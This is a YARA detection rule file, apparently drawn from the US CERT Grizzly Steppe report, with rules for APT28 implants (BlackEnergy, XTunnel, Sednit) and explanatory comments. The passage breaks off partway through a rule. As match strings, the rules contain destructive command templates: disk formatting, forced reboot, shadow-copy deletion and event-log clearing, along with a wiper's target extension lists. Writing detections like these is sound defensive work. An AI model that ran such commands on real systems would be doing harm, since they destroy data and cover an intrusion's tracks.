rule IMPLANT_4_v3_AlternativeRule { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" comment 
= "Alternative rule - not based on the original samples but samples on which the original rule matched"
    author = "Florian Roth"
    reference = "US CERT Grizzly Steppe Report"
    date = "2017-02-12"
    hash1 = "2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a"
  strings:
    $op1 = { 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 53 1e 01 00 } /* Opcode */
    $op2 = { 21 da 40 00 00 a0 40 00 08 a0 40 00 b0 70 40 00 } /* Opcode */
  condition:
    // MZ header plus both opcode sequences.
    ( uint16(0) == 0x5a4d and all of them )
}

/* Alternative Rule Set ---------------------------------------------------- */

// IMPLANT_4_v4: literal command templates for a destructive payload --
// "format <drive>:" and a delayed "shutdown /r" -- plus the "PhysicalDrive%d"
// device name. Every $DK_* string must be present in an MZ file, so the rule
// is specific, but a sample that assembles these strings at runtime is missed.
rule IMPLANT_4_v4 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $DK_format1 = "/c format %c: /Y /Q" ascii
    $DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
    $DK_physicaldrive = "PhysicalDrive%d" wide
    $DK_shutdown = "shutdown /r /t %d"
  condition:
    uint16(0) == 0x5A4D and all of ($DK*)
}

// IMPLANT_4_v5: a single 8-byte opcode sequence (movsx ecx,cl / rol eax,7 /
// xor eax,ecx -- a rotate-and-xor step of the kind used in name-hashing loops;
// confirm against a sample). The gate accepts several container magics: "MZ",
// D0 CF (OLE2), D4 C3, "%PDF", and "{\rtf" (uint32 at offset 1). A pattern this
// short behind a gate this wide is a low-confidence indicator: treat a hit as
// a lead to confirm, not as a verdict on its own.
rule IMPLANT_4_v5 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $GEN_HASH = {0F BE C9 C1 C0 07 33 C1}
  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}

/* TOO MANY FALSE POSITIVES
rule IMPLANT_4_v6 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = "DispatchCommand" wide ascii
    $STR2 = "DispatchEvent" wide ascii
  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}
*/

rule IMPLANT_4_v7 {
  meta:
    description
= "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C} $sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C} $sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C} $sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C} $sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C} $sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C} $sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C} $sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C} $sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C} $sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 3 of them } rule IMPLANT_4_v8 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41 3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56 57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50 68 00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18} $f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8 33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08 D1 E8 89 45 F8 8B 4D EC 83 C1 08 89 4D FC} $f3 = {5F 8B DF 83 
C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB 4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00 00 00 F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68 65 6C 54 FF 57} $a1 = {83 EC 04 60 E9 1E 01 00 00} condition: $a1 at pe.entry_point or any of ($f*) } rule IMPLANT_4_v9 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $a = "wevtutil clear-log" ascii wide nocase $b = "vssadmin delete shadows" ascii wide nocase $c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase $d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase //$e = {57 55 33 c9 51 8b c3 99 57 52 50} $openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52 50 E8 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89 44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 50 56 FF 15 ?? ?? ?? ?? 
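85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }
    // push 0xC0000000 (GENERIC_READ|GENERIC_WRITE) / push 3 / push 3: argument
    // setup consistent with a CreateFile call, matching the name of the string
    // above -- confirm against a sample.
    $f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0}
  condition:
    // $a and $b (event-log clearing, shadow-copy deletion) also occur in
    // legitimate administration scripts, so they only count as a pair. $c and
    // $d are literal Global\ object names and fire on their own.
    ($a and $b) or $c or $d or ($openPhysicalDiskOverwriteWithZeros and $f)
}

// IMPLANT_4_v10: twenty anonymous 4-byte constants. Any single 4-byte value
// recurs in large binaries, so the rule requires 15 of the 20 inside a file
// with an MZ header whose e_lfanew (offset 0x3C) points at a "PE" signature.
rule IMPLANT_4_v10 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $ = {A1B05C72}
    $ = {EB3D0384}
    $ = {6F45594E}
    $ = {71815A4E}
    $ = {D5B03E72}
    $ = {6B43594E}
    $ = {F572993D}
    $ = {665D9DC0}
    $ = {0BE7A75A}
    $ = {F37443C5}
    $ = {A2A474BB}
    $ = {97DEEC67}
    $ = {7E0CB078}
    $ = {9C9678BF}
    $ = {4A37A149}
    $ = {8667416B}
    $ = {0A375BA4}
    $ = {DC505A8D}
    $ = {02F1F808}
    $ = {2C819712}
  condition:
    uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550 and 15 of them
}

// IMPLANT_4_v11: a "format" command template, three UTF-16 file-extension
// lists (the targets of a wiper), and a temp-file name template. Any 2 of the
// 5 strings in a file carrying one of the accepted container magics ("MZ",
// D0 CF, D4 C3, "%PDF", "{\rtf" at offset 1) is a match.
rule IMPLANT_4_v11 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $ = "/c format %c: /Y /X /FS:NTFS"
    $ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
    $ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide
    // Fix: the source text read ".cf g.boot" -- presumably a wrapped line
    // carried over from the advisory. A literal space inside the list made this
    // string unmatchable; corrected to ".cfg", consistent with the list above.
    $ = ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cfg.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide
    $tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide
  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 2 of them
}

/* Deactivated - Slowing down scanning
rule IMPLANT_4_v12 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $CMP1 = {81 ?? 4D 5A 00 00 }
    $SUB1 = {81 ??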
00 10 00 00}
    $CMP2 = {66 81 38 4D 5A}
    $SUB2 = {2D 00 10 00 00}
    $HAL = "HAL.dll"
    $OUT = {E6 64 E9 ?? ?? FF FF}
  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and ($CMP1 or $CMP2) and ($SUB1 or $SUB2) and $OUT and $HAL
}
*/

// IMPLANT_4_v13: MSXML usage plus two exported names. $XMLDOM1/$XMLDOM2 are
// little-endian GUIDs from the MSXML family (2933BF81- / 2933BF90-7B36-11D2-
// B20E-00C04F983E60). $XMLPARSE is a COM vtable call sequence (call [ecx+0x104]
// ... call [ecx+0x30]) with wildcarded stack offsets; $BDATA ends in a "ret 8"
// epilogue. All strings are required, so the exported names
// "DispatchCommand"/"DispatchEvent" (weak on their own) only add specificity.
rule IMPLANT_4_v13 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $XMLDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
    $XMLDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
    $XMLPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00 66 83 7D ?C FF 75 3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0 78 2?}
    $EXP1 = "DispatchCommand"
    $EXP2 = "DispatchEvent"
    $BDATA = {85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D C2 08 00 8B 4? 0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?}
  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}

// IMPLANT_5_v1: $hexstr is the UTF-16LE table "-Si", "-Sp", "-Up", "-Pi",
// "-Pp" (NUL-separated; presumably command-line switches -- confirm). The four
// text strings are error messages with a trailing "\x0a" newline. No header
// gate: any one of the five strings is a match, which is acceptable because
// each string is distinctive on its own.
rule IMPLANT_5_v1 {
  meta:
    description = "XTunnel Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00 70 00 00 00 2D 00 50 00 69 00 00 00 2D 00 50 00 70 00 00 00}
    $UDPMSG1 = "error 2005 recv from server UDP - %d\x0a"
    $TPSMSG1 = "error 2004 send to TPS - %d\x0a"
    $TPSMSG2 = "error 2003 recv from TPS - %d\x0a"
    $UDPMSG2 = "error 2002 send to server UDP - %d\x0a"
  condition:
    any of them
}

// IMPLANT_5_v2: a table of fixed 32-byte constants, one hex string per key.
rule IMPLANT_5_v2 {
  meta:
    description = "XTunnel Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $key0 = {
987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 } $key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 } $key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 } $key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 } $key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 } $key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 } $key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 } $key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE } $key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A } $key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB } $key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D } $key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 } $key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 } $key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 } $key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 } $key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 } $key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 } $key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E } $key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B } $key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 } $key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 } $key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 } $key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 } $key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 } $key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 } $key25 = { 
C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC } $key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB } $key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB } $key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 } $key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 } $key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B } $key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 } $key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 } $key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 } $key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D } $key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F } $key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 } $key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 } $key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 } $key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 } $key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 } $key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 } $key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 } $key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F } $key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 } $key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 } $key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C } $key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C } $key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C } $key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 } $key50 = { 
731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 } $key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 } $key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 } $key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 } $key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB } $key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 } $key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 } $key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA } $key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC } $key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB } $key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA } $key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 } $key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 } $key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB } $key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F } $key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C } $key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD } $key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A } $key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B } $key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 } $key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 } $key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 } $key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 } $key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 } $key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 } $key75 = { 
D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 } $key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 } $key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 } $key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 } $key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E } $key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 } $key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 } $key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E } $key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 } $key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 } $key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 } $key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 } $key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 } $key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F } $key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 } $key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F } $key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 } $key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 } $key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 } $key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 } $key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C } $key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 } $key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E } $key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 } $key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 } $key100 = { 
5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E } $key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 } $key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 } $key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 } $key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 } $key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 } $key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 } $key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 } $key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 } $key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED } $key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D } $key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 } $key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E } $key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 } $key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D } $key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C } $key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 } $key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A } $key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D } $key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B } $key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 } $key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF } $key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 } $key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 } $key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 } $key125 = { 
540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 } $key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 } $key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 } condition: any of them } rule IMPLANT_5_v3 { meta: description = "XTunnel Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 } $BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 } condition: any of them } rule IMPLANT_5_v4 { meta: description = "XTunnel Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 } $FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 } $FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 } $FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 } $FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 } condition: all of them } rule IMPLANT_6_v1 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = "dll.dll" wide ascii $STR2 = "Init1" wide ascii $STR3 = "netui.dll" wide ascii condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v2 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: 
